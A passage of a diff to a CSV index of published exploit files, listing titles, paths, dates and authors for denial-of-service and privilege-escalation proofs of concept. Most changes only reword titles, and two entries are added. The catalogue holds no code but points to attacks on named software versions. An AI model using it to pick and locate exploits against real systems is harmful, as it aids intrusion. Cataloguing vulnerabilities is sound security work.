PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",dos,linux, 39942,exploits/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",dos,linux, 39943,exploits/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",dos,linux, 
@@ -5188,7 +5188,7 @@ id,file,description,date,author,type,platform,port 39960,exploits/windows/dos/39960.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",dos,windows, 39961,exploits/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",dos,linux, 39986,exploits/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",dos,linux, -39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",dos,windows, +39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",dos,windows, 39991,exploits/windows/dos/39991.txt,"Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",dos,windows, 39993,exploits/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",dos,win_x86, 39994,exploits/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,dos,windows, 
@@ -5222,7 +5222,7 @@ id,file,description,date,author,type,platform,port 40253,exploits/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",dos,windows, 40255,exploits/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",dos,windows, 40256,exploits/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",dos,windows, -40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",dos,windows, +40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",dos,windows, 40308,exploits/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, 40289,exploits/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",dos,hardware, 40291,exploits/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",dos,linux, 
@@ -5383,7 +5383,7 @@ id,file,description,date,author,type,platform,port 41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",dos,windows, 41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android, 41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80 -41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",dos,windows, +41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",dos,windows, 41350,exploits/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,dos,linux, 41351,exploits/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",dos,android, 41352,exploits/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",dos,android, 
@@ -5419,7 +5419,7 @@ id,file,description,date,author,type,platform,port 41610,exploits/multiple/dos/41610.txt,"Adobe Flash - ATF Thumbnailing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, 41611,exploits/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, 41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, -41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows, +41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows, 41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, @@ -5428,18 +5428,18 @@ id,file,description,date,author,type,platform,port 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 
+41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 41654,exploits/windows/dos/41654.txt,"Microsoft Windows - Uniscribe Font Processing Buffer Overflow in 'USP10!FillAlternatesList' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, -41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 
41656,exploits/windows/dos/41656.txt,"Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41657,exploits/windows/dos/41657.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, -41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41659,exploits/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, 41660,exploits/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",dos,multiple, 41661,exploits/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",dos,windows, 
@@ -5506,7 +5506,7 @@ id,file,description,date,author,type,platform,port 41982,exploits/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",dos,android, 41983,exploits/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow",2017-05-09,"Google Security Research",dos,android, 41984,exploits/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,dos,multiple, -41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",dos,linux, +41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap Buffer Overflow",2017-05-10,"Core Security",dos,linux, 41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,dos,multiple,1194 42001,exploits/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 42002,exploits/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 
@@ -5593,7 +5593,7 @@ id,file,description,date,author,type,platform,port 42231,exploits/windows/dos/42231.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, 42232,exploits/windows/dos/42232.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, 42233,exploits/windows/dos/42233.cpp,"Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, -42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption",2017-06-23,"Google Security Research",dos,windows, +42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap Memory Corruption",2017-06-23,"Google Security Research",dos,windows, 42235,exploits/windows/dos/42235.txt,"Microsoft Windows - 'USP10!ttoGetTableData' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, 42236,exploits/windows/dos/42236.txt,"Microsoft Windows - 'USP10!SubstituteNtoM' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, 42237,exploits/windows/dos/42237.txt,"Microsoft Windows - 'USP10!CreateIndexTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, 
@@ -5611,7 +5611,7 @@ id,file,description,date,author,type,platform,port 42249,exploits/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",dos,multiple, 42253,exploits/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,dos,windows, 42258,exploits/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, -42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, +42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, 42260,exploits/multiple/dos/42260.py,"IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,dos,multiple, 42264,exploits/windows/dos/42264.txt,"Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API",2017-06-27,"Google Security Research",dos,windows, 42272,exploits/netbsd_x86/dos/42272.c,"NetBSD - 'Stack Clash' (PoC)",2017-06-28,"Qualys Corporation",dos,netbsd_x86, 
@@ -5678,9 +5678,9 @@ id,file,description,date,author,type,platform,port 42495,exploits/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",dos,windows, 42546,exploits/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,dos,linux, 42518,exploits/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",dos,hardware, -42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",dos,linux, +42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap Buffer Overflow",2017-09-01,"Ke Liu",dos,linux, 42602,exploits/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",dos,multiple, -42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,dos,linux, +42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap Buffer Overflow",2017-09-11,FarazPajohan,dos,linux, 42666,exploits/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)",2017-09-12,"Google Security Research",dos,multiple, 42747,exploits/windows/dos/42747.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, 42741,exploits/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, 
@@ -5703,14 +5703,14 @@ id,file,description,date,author,type,platform,port 42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows, 42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows, 42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux, -42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, -42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, -42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, +42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap Overflow",2017-10-02,"Google Security Research",dos,multiple, +42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap Overflow",2017-10-02,"Google Security Research",dos,multiple, +42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack Overflow",2017-10-02,"Google Security Research",dos,multiple, 42944,exploits/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",dos,multiple, 42945,exploits/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",dos,multiple, 42946,exploits/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",dos,multiple, 42955,exploits/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",dos,multiple, -42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, +42970,exploits/linux/dos/42970.txt,"binutils 
2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, 42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows, 42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple, 42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows, @@ -5733,7 +5733,7 @@ id,file,description,date,author,type,platform,port 43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows, 43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows, 43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows, -43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",dos,multiple, +43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",dos,multiple, 43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows, 43144,exploits/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",dos,windows, 43152,exploits/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",dos,windows, 
@@ -5761,6 +5761,8 @@ id,file,description,date,author,type,platform,port 43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows, 43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows, 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, +43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux, +43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -5781,7 +5783,7 @@ id,file,description,date,author,type,platform,port 106,exploits/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",local,linux, 114,exploits/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow",2003-10-27,osker178,local,solaris, 118,exploits/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",local,bsd, -120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation",2003-11-13,Li0n7,local,linux, +120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation",2003-11-13,Li0n7,local,linux, 122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows, 125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd, 129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",local,linux, 
@@ -5810,7 +5812,7 @@ id,file,description,date,author,type,platform,port 203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux, 205,exploits/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Local Privilege Escalation",2000-11-29,Tlabs,local,linux, 206,exploits/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation",2000-11-29,mat,local,linux, -207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation",2000-11-30,vade79,local,bsd, +207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Local Privilege Escalation",2000-11-30,vade79,local,bsd, 209,exploits/linux/local/209.c,"GLIBC - '/bin/su' Local Privilege Escalation",2000-11-30,localcore,local,linux, 210,exploits/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,local,solaris, 215,exploits/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,local,linux, 
@@ -5828,14 +5830,14 @@ id,file,description,date,author,type,platform,port 249,exploits/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,local,linux, 250,exploits/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,local,solaris, 252,exploits/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow",2001-01-15,teleh0r,local,linux, -255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,local,linux, +255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation",2001-01-19,teleh0r,local,linux, 256,exploits/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",local,solaris, 257,exploits/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,local,linux, 258,exploits/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,local,linux, 259,exploits/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,local,tru64, 260,exploits/linux/local/260.c,"splitvt < 1.6.5 - Local Overflow",2001-01-26,"Michel Kaempf",local,linux, 261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco, -265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, +265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, 270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix, 271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, 272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow 
(PoC)",2004-04-15,snooq,local,windows, @@ -5859,9 +5861,9 @@ id,file,description,date,author,type,platform,port 332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris, 333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix, 334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix, -335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix, +335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix, 336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix, -337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation",1997-05-27,"David Hedley",local,irix, +337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation",1997-05-27,"David Hedley",local,irix, 338,exploits/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm '-xrm' Local Privilege Escalation",1997-05-28,"David Hedley",local,solaris, 339,exploits/linux/local/339.c,"zgv - '$HOME' Local Buffer Overflow",1997-06-20,"BeastMaster V",local,linux, 341,exploits/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow",1997-07-12,"Cristian Schipor",local,solaris, 
@@ -5901,7 +5903,7 @@ id,file,description,date,author,type,platform,port 587,exploits/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,local,linux, 591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux, 600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow (PoC)",2004-10-26,anonymous,local,linux, -601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,local,linux, +601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Buffer Overflow (PoC)",2004-10-26,infamous41md,local,linux, 602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco, 624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux, 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple, 
